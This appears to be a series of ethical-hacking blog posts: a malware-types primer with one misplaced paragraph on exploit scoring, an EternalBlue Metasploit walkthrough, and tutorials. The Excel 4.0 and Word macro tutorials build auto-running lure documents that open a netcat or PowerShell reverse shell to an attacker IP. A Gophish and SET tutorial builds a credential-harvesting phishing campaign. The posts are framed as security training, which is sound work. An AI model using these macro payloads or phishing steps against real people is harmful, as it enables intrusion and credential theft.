Posted on

Malware guide for absolute beginners

Hello, aspiring ethical hackers. This blogpost is intended to be a beginner’s guide to malware. This blogpost will teach you what is malware, its purpose, types of malware and functions of malware.

What is Malware?

Malware stands for malicious software. So, any software that performs malicious actions on a computer or mobile is called as malware. These malicious actions include showing persistent popups, encrypting data, stealing data, deleting data, capturing sensitive information and making the target system completely unusable etc. Based on its functions, and purpose malware can be classified into various types.

Malware 1

Types of Malware

VIRUS

Often used interchangeably with malware, virus is the most popular malware you may encounter in cyber security. Just like its pathological namesake, virus attaches itself to an executable or program to propagate or infect computer. Virus always requires human action to infect system.

According to Discovery, the first virus is the Creeper program. It was created by Bob Thomas in 1971. It was actually designed as a security test to see if a self-replicating program will be successful. The function of Creeper was to just display a simple message on computer if infected.

Malware 2

The most popular (or should I say unpopular) virus should be ILOVEYOU virus. Released in 2000, ILOVEYOU infected over ten million Windows computers. It started spreading as an email message with subject line “I LOVE YOU” and contained an attachment with name “LOVE-LETTER-FOR-YOU.TXT.VBS. When the recipient clicked on this attachment, a Visual Basic script activated and over writes files on the infected system. Then, it sent itself to all the email addresses in the Windows Address Book. It is estimate that the cost of this simple virus was at least $15 billion.

Malware 3

WORM

A computer worm is a type of malware that unlike virus doesn’t need any human action or interaction to infect target systems. Usually a computer worm spreads by exploiting vulnerability on the target systems. They also have no need to attach themselves to any program or executable.

Malware 4

Morris worm is considered to be the first worm to spread over the internet. It was created by Robert Tappan Morris and it caused a loss of over $100,000 and $10,000,000. It infected over 2000 computers within 15 hours. Morris worm spread by exploiting vulnerabilities like holes in the debug mode of the Unix send mail program, a buffer overflow vulnerability in finger network service. Rexec and Rsh accounts with weak or no password at all.

Malware 5

The most unpopular worm should definitely be Stuxnet. Released in 2010 and accused of sabotaging nuclear program of Iran, Stuxnet was designed to target programmable logic controllers (PLCs). These PLC’s allow automation of electromechanical process used by control machines and industrial processes (for example, gas centrifuge that are used to separate nuclear material). Stuxnet spread by exploiting 4 Zero-day vulnerabilities in Siemens setup7 software installed on Windows systems. Stuxnet infected almost over 2,00,000 computers and destroyed at least 100 machines.

Malware 6

TROJAN

A Trojan acts as some other file (usually benign, genuine and harmless) but performs malicious actions. The name is a reference to the Trojan horse (the large wooden horse) assumed by Trojans as gift given by Greeks to Troy. However, when the horse was let into the kingdom, Greek soldiers hiding inside the horse came out and ransacked Troy. (you should watch Troy movie).

Malware 7 1024x681

Just like viruses, Trojans also need victims to click on Trojan to be activated and most users fall victim to trojans thinking that they are genuine files. ANIMAL, a program released in 1975 is generally considered the world’s first Trojan. It fooled victims by presenting itself as a simple game of 20 questions. When user clicked on it, it copied itself to shared directories to be found by other victims.

Malware 8

According to me, the most dangerous Trojan was Zeus. Zeus is a banking Trojan used to steal banking information. It is spread by drive by downloads and phishing in 2003. It is estimated that Zeus infected over 74,000 FTP accounts.

Malware 9 1

ADWARE

Adware stands for Advertising malware. Have you ever experienced you are viewing something in your favorite browser and you are being incessantly bombarded with ads, especially ads which you did not and never wanted? If you had that experience you have encountered adware and if you didn’t it is thanks to ad blockers enabled by almost all browsers. Note that Adware is sometimes genuine too.

SPYWARE

Spyware is short for spying software and now you know what it does. It spies and gathers information about a user or organization. Spyware may be present in even legitimate software. The first recorded spyware is considered to be a freeware game called “Elf Bowling” as it came bundled with tracking software.

The most popular spyware seen recently should be Pegasus spyware. This spyware developed by Israeli cyber arms firm NSO Group installs not just covertly but remotely on mobile phones running IOS and Android and that too using a Zero-click exploit. Once installed on a device, Pegasus can read text messages, snoop on calls, collect credentials, track location of the device, access device’s cameras and microphone and harvest information from apps installed on the target device.

Malware 10

KEYLOGGER

Keylogger is a malicious software that records keystrokes a user types into computer on mobiles. The first keylogger used in real world was allegedly distributed with Grand Theft Auto V mod in 2015. Recently, a keylogger named Snake keylogger was detected being distributed with Microsoft Excel sample. Snake keylogger first appeared in late 2020.

Malware 11

ROOTKIT

Rootkit is a malicious software that is designed to enable access to a computer in a way that is not usually possible to an authorized user. Simply put, Rootkit gives SYSTEM level access. As if this is not enough, Rootkit is undetectable once installed, unlike other types of malware. The term “Rootkit” is a combination of root (the most privileged account on Unix system and “kit”. This is because rootkits usually give ‘root’ level access to the target system.

The first malicious rootkit appeared in 1999 and it affected Windows NT OS. In 2012, a rootkit named Flame was detected. Flame affected over 80 servers around the world and is considered one of the dangerous rootkits.

Malware 12

BACKDOOR

Malware 13

A backdoor is a type of malware that provides access to a system bypassing normal security measures that usually prevent access. For example, if you can access a system without providing any login or need of credentials, you have a Backdoor access. Usually, hackers install backdoor after gaining complete access to the system to have unhindered and continuous access in future.

In 1998, a U.S hacker group “Cult of the Dead cow” designed a backdoor named “Back Orifice” that enables a user to control a computer remotely. In 2014, multiple backdoors were detected in WordPress. These backdoors were WordPress plugins with an obfuscated JavaScript code.

BOT

A BOT is a shortcut for Robot and it is an automated piece of code that performs predefined tasks. Malicious Bots as normally used to infect a system and make them a part of a Botnet which can then be used to perform DDOS attacks.

Malware 14 1

In 2007, all botnet attack called Cutwail attacked Windows systems using a trojan named Pushdo which infected Windows systems to make them part of the Cutwail botnet. This botnet had over 1.5 to 2 million computers. The most famous BOT malware should be MIRAI. MIRAI is designed to infect smart devices that run on ARC processes.

Malware 15

RANSOMWARE

Ransomware is a malicious software that locks victim’s computers or encrypts the victim’s files or permanently block access to the victim’s system. Its called ransomware as the key to decrypt the data or access the system is not provided unless a ransom is paid.

The first known ransomware was AIDS Trojan. It’s payload hid the files on the victim’s hard drive and encrypted their names. The most dangerous & popular ransomware attack was WannaCry in 2017. WannaCry ransomware spread by exploiting EternalBlue vulnerability and it infected over 2,30,000 computers within one day.

Malware 16

This score depends on the additional work that has to be put by attacker to exploit the vulnerability. For example, exploiting EternalBlue does not need any additional work by attacker whereas to performing a Man-In middle attack requires additional work from the attacker. Usually, the additional work the attacker puts depends on factors which are out of control of the attacker.

CRYPTO MINER

Crypto mining malware or cryptojacker is a malicious software that targets computer sources and mines crypto currencies like Bitcoin. Cryptominers are rather new in the evolution of malware. Their growth directly grew with the growth in popularity of crypto currencies.

Posted on

EternalBlue vulnerability: Explained with POC

Hello, aspiring Ethical Hackers. In this article, you will learn about the infamous EternalBlue vulnerability and its exploitation.

Vulnerability & Impact

Exploited by Wannacry ransomware, the EternalBlue vulnerability exists in the Server Message Block (SMB) protocol. Due to improper handling of specially crafted packets by SMB version 1 (SMBV1) of Microsoft windows this vulnerability allows attackers to execute malicious code on the vulnerable systems. This vulnerability affects Microsoft Windows versions Windows Vista, Windows 7, Windows 8.1, Windows 10, Windows Server 2008, Windows Server 2012, Windows XP, Windows 8 and Windows Server 2003. This vulnerability was observed being exploited as recently as 2020.

Proof Of Concept

As the vulnerability is so famous (I mean infamous), Metasploit has already released exploit modules for this particular vulnerability.

Eternal Blue 2

We are going to test some of these modules on a Windows 7 target. Let’s first use the scanner module of metasploit to test whether this machine is vulnerable to EternalBlue vulnerability.

Eternal Blue 34

Set the RHOSTS option and execute the module.

Eternal Blue 5

The scanner module confirms that the target is indeed vulnerable. Now, let’s load the module for exploiting Eternal Blue vulnerability and grab a session.

Eternal Blue 67

Set all the required options and use “check” command to see if the target is indeed vulnerable.

Eternal Blue 8

After all the required options are set, execute the module.

eternalblue

As you can see, we got a meterpreter session on the target system and that too with SYSTEM privileges.

Posted on

Excel Macros for beginners

Hello aspiring ethical hackers. In our previous article, you have learnt what a Macro is and how to create a malicious VBA macro. In this article, you will learn about Excel 4.0 Macros and how to create one. Excel 4.0 Macros or XLM were introduced by Microsoft in 1992 when Excel 4.0 was launched as a default macro language and they serve the same functions as VBA macros in Word.

As Excel 4.0 Macros are used for legitimate purposes, they can’t just be disabled by many. Further increasing the effectiveness of these macros, there is not yet a good detection method to detect malicious XL4 macros. Apart from this, they are very simple create but also very powerful just like Visual Basic Application (VBA) Macros.

Now let’s see how to create an Excel 4.0 Macro. On a Windows system, we open Excel in Microsoft Office or the Office Suite. We are doing this on Microsoft Office 2007. You should see an Excel Workbook opened as shown below.

Excel Macro 1 1024x543

Right click on “Sheet 1” and select the “Insert” option as shown below.

Excel Macro 2 1024x546

In the newly opened window, select MS Excel 4.0 Macro and click on “OK”.

excel 4.0 macros

This will change the name of “Sheet 1” to “Macro 1” as shown below.

Excel Macro 4 1024x546

Save the file with the name you like. We have named it “evil_macro” for easy identification. While saving it, save it as a Macro Enabled Excel Workbook.

Excel Macro 5 1024x547

Once the file is saved, it’s time to create the macro. In the first column, which is named A1, we insert the command given below.

=EXEC(“cmd.exe”)

You may not realize, but you have already created your first XL4 macro. In the second column, i.e A2, insert another command =HALT(). This is to ensure that the macro you created does not face an error while running. It’s time to test your macro. Right Click on the first column, and click on “Run” as shown below.

Excel Macro 6 1024x545

Most probably, this will open a new window as shown below. Click on “Run”.

Excel Macro 7 1024x545

Doing this opens a Windows CMD window as shown below.

Excel Macro 10 1024x545

Voila, we successfully created a Excel 4.0 Macro and even executed it. If you have noticed it, we opened a Windows CMD by inserting a simple code. Now, let’s make a few changes to the “evil_macro” file. Move the =HALT() command to A3 cell and enter command given below in cell A2. Save the file.

=ALERT(“You have been hacked”)

Excel Macro 11 1024x545

Right click on Cell A1 and select “Run” again just like you did before.

Excel Macro 14 1024x545

Now, we can see that apart from Windows CMD window being opened, another window popped up with the message “You have been hacked”. We have just performed two operations with macros in one file. Not just cmd.exe, we can open other programs like Notepad and Calc.exe using the “=exec” function.

Excel Macro 15 1024x545
Excel Macro 16 1024x548

Now, let’s try something a bit advanced like spawning a reverse shell now. Download the Netcat Windows executable. Open Notepad and insert the following command into it.

<Path to Netcat Windows executable> <target IP> <target port> -e cmd.exe.

On our system, this command looks like this.

C:\Users\nspadm\Desktop\nc.exe 192.168.36.189 4444 -e cmd.exe

The -e option specifies which command to execute after netcat makes a successful connection. Now, save this file as a CMD file. This can be done by saving the file in double quotes. For example, “shell.cmd” and keeping the file type as all files.

Excel Macro 17

Now, in your evil_macro file, change the =EXEC function to execute the shell.cmd file you just now created as shown below.

Excel Macro 18a

Save the file. Before executing the macro, start a Netcat listener on the listener IP address you specified.

Excel Macro 19

Now, when you execute the macro, you should get a successful shell as shown below.

Excel Macro 20

This is all fine but nobody will open an Excel file and execute some suspicious looking code in it. We need the code to run automatically as soon as the user opens the Excel file. To do this, Click on A1 cell of your “evil_macro” file and rename it to “Auto_Open” as shown below.

Excel Macro 22

Save the changes and close the file. Start the netcat listener again. Now, just open the evil_macro file and you should see the successful spawning of reverse shell again. That’s all about Excel 4.0 Macros for now.

Posted on

Malicious Macro’s : What, Why and How

Hello aspiring Ethical Hackers. In this article, you will learn about Malicious Macros also known as Macro Malware or Macro Virus. In computer science, a Macro is a set of commands grouped together as a single command. This is used to run some tasks automatically. In Word, Macros are used to automate frequently used tasks.
Hackers have been using Macros since a long time as a means to gain initial access to target networks by injecting malicious code into macros. These macros all called malicious macros or macro malware or macro virus. Let’s see how to create a malicious macro.
For this we will be using a tool that is here. In Kali, clone this tool as shown below.

Macro Virus 1

Navigate into the cloned directory.

Macro Virus 2

Inside that directory, there will be two python scripts: “newpayloadgeneration.py” and ‘payload.py’. Run the script ‘newpayloadgeneration.py’ giving the Attacker IP and port as options. This script generates a Powershell script for reverse shell. Obviously, the IP and port should be of that system on which the listener is running to receive the reverse shell.

Macro Virus 3
Macro Virus 4
Macro Virus 5

Copy the generated encoded string. Open the file ‘payload.py’ and paste the encoded string in the highlighted place.

Macro Virus 6
Macro Virus 8 1024x576
Macro Virus 7 1024x576

Once pasted, save the file ‘payload.py’ to preserve the changes. Now, execute the ‘payload.py’ script.

Macro Virus 9
Macro Virus 10

The code for malicious macro is ready. Now let’s create a Macro document. For this tutorial, we are using MS Office 2007 to create it. Open a new Word document, go to View tab and click on Macros (as highlighted below).

malicious macro

Click on “view macros”.

Macro Virus 12 1024x543

In the new window that opens, click on “create” and give any name you prefer to that macro (We named it test, obviously).

Macro Virus 13 1024x543

Now, we create the code for macro. It starts with “Sub AutoOpen(). “Sub” stands for Subroutine in macro. It is a small program within the Visual Basic editor. Setting AutoOpen() executes the macro automatically whenever the document is opened. In the subroutine test(), we paste the malicious code we created earlier as shown below.

Macro Virus 14 1024x546

Then we save this file. This file is sent to the target users. In Real World hacking attacks, since this is the lure document, some bells and whistles are added to convince users to open the document and enable macros. We start the Netcat listener on the attacker machine. When the target user opens this file, we get a security warning saying that macros have been disabled. This is a security feature by Microsoft to protect user from malicious macros. Let’s enable macros for this tutorial. click on options and enable macros as shown below.

Macro Virus 15a 1024x545
Macro Virus 15b 1024x546

As soon as we do this, a Powershell window opens (remember that a we created a Powershell reverse shell)

Macro Virus 15c 1024x544

and we get a incoming reverse shell on our listener as shown below.

Macro Virus 16

This is how malicious macros work to give attackers initial access.

Posted on

Gophish: Setup a Phishing Campaign

Hello aspiring ethical hackers. In this article you will learn how to setup a phishing campaign. Readers have learnt what is phishing and various phishing techniques in our previous blog posts. It is a fitting conclusion that the next article in our phishing series should be about creating a phishing campaign. Phishing campaign or Email phishing campaign or Spear Phishing campaign is the campaign that sends emails to the victims to lure them to the Phishing site.

Although, this tutorial is similar to phishing campaigns run by malicious hackers, this campaign can also be used to test the security of a company by assessing how vulnerable are the employees of the company to a phishing attack. There are many tools to simulate phishing attacks which are used by Red Team professionals. Gophish is an open-source phishing toolkit designed for businesses and penetration testers. It provides the ability to quickly and easily setup and execute phishing engagements and security awareness training. It is available for both Windows and Linux operating systems.

I will be using a Windows version of Gophish as I want to install it on Windows. Installing Gophish on Windows is damn easy. Just download Gophish for Windows, extract the contents of the zip archive. open Windows command line and navigate into the extracted directory and execute the Gophish executable as shown below. This executes some commands as shown below.

Gophish 1

If you observe the CMD window, you will find the username and password for the Gophish dashboard. This part is highlighted in the image above. These credentials are needed to login into the Gophish dashboard. Keep the CMD window open, Open Browser and enter address https://127.0.0.1:3333. This is the default port on which Gophish runs. If you get any certificate error, click on advanced to bypass it and then enter submit the above mentioned credentials.

Gophish 2 1024x545
gophish

The first thing you will see after logging in is that the system prompts you to reset your password. Reset the password.

Gophish 4 1024x548

Now, you can access the Gophish dashboard.

Gophish 5 1024x544

The first thing we need to do is create a sender profile. This is the mail address from which the spear phishing email comes from.

Gophish 6 1024x545

Click on “Sending profiles” tab and then click on “New profile” to create a new Sending Profile. Set the options for the sending profile. For example, we set the name for this as “phishing campaign 1”. To send any type of email, we’ll need a SMTP server. For this tutorial, I will be using the SMTP server of Gmail as I will be sending an email from Gmail. In Real world phishing attacks and even in many phishing simulations, a new domain is created and the email is sent from that domain’s mail to make the phishing email appear genuine. The username is the Gmail username and password is Gmail password.

Gophish 7 1024x548

Save the changes. Send a test email to the email of your choice to see if the Phishing email appears as you want it to be.

Gophish 8 1024x548

The username we specify is very important here as it will be displayed. So it has to be made as convincing as possible. Once you are satisfied with the sending profile, you can save it.

Gophish 9 1024x542

Next, we need to create Users and Groups. This is where we assign target users for of our phishing campaign.

Gophish 10 1024x547

Click on “New Group” to create a new batch of recipients. I have named this group as Target_ 1.

Gophish 11 1024x545

For this tutorial, I’ll add only a single recipient.

Gophish 12 1024x547

If you want to add a large number of users, you can save them in a CSV file and just import those users with the “bulk import users option”.

Gophish 13 1024x543
Gophish 14 1024x544

It’s time to create an email template. This is the most important part of a phishing email since it has the email body that convinces a victim to click or take any other action.

Gophish 15 1024x545

But before we compose the spear phishing email, let’s create a phishing website. For this tutorial, we will be capturing some credentials. Hence we will be using a fake website created using Social Engineering Toolkit in Kali Linux. We can also create a phishing website with Weeman.

Se Toolkit 7

The phishing site is ready and will display any captured credentials on this terminal. Go back to Gophish. Click on “New Template” to create a new email.

Gophish 16 1024x543

Remember what I said. This part is the most important and the content of the email should convince the user take whatever action you want him to take. We are just showing the age-old account suspension mail. Let’s have a look at some of the spear phishing emails used in real world hacking attacks.

Gophish 16bb

The above mail is sent to Godaddy customers. The Logo, Customer support number etc almost convince even me but just look at the Sender Email. The domain of Godaddy is godaddy.com but sender email is really phishy.

Gophish 16cc

This above phishing email is a must read. Everything looks so convincing. Even I think I have a account at Suntrust. Only when we hover over the link that we can see it is suspicious.

Gophish 16aa

The above mail is directed towards Instagram users. Although sender email is phishy, have a look at the message of the mail. It says your Instagram password has been changed and if it is not you that changed the password, you are asked to click on the link they have provided to reset your password. It even provides a link to the Instagram Help Center to appear trustworthy.

I am sure readers got an idea about how phishing emails look like. If you find an email suspicious, just hover over the links instead of clicking on them. Once, the body of the email is complete, let’s add a hyperlink to the email content. Click on “source”.

Gophish 17 1024x544

I want the users to be redirected to my Kali Linux attacker machine.

Gophish 18 1024x544
Gophish 19 1024x545

The Email template is ready. It’s time to set the landing page. Landing page in Gophish is the page where users will be redirected to after clicking a link in the email.

Gophish 20 1024x544

Click on “New Page”. You can create a new landing page or you can import an already created landing page. Let me import the phishing site I created in SE Toolkit on Kali Linux. After capturing credentials,

Gophish 22 1024x546
Gophish 23 1024x546

Just like any phishing website, we can redirect the users to another webpage after capturing credentials. I want the victims to be redirected to the genuine site of Facebook.

Gophish 25 1024x541

Save the landing page.

Gophish 26 1024x544

Everything is ready. It’s time to start the phishing campaign. Go to campaigns and click on “New Campaign”.

Gophish 27 1024x474

Specify all the options like URl, the recipients etc and click on “Launch campaign”. You can set the date and timing for the phishing campaign.

Gophish 29 1024x543
Gophish 30 1024x245
Gophish 31 1024x544

In the dashboard you can view result of the campaign. You can see how many victims read your email and how many fell to your phishing campaign.

Gophish 32 1024x545

This is how the spear phishing email I created looks in Email Inbox.

Gophish 33 1024x141

Here is how the content of the email looks.

Gophish 34 1024x327

Here is the phishing site the user is redirected to once he clicks on the link.

Gophish 35 1024x423

Once the victim fails to notice the signs of a phishing email, he enters his credentials.

Gophish 36 1024x467

These credentials are captured in SETOOLKIT as shown below.

Gophish 37

Credentials captured and our phishing campaign is successful. This is how a successful campaign is run.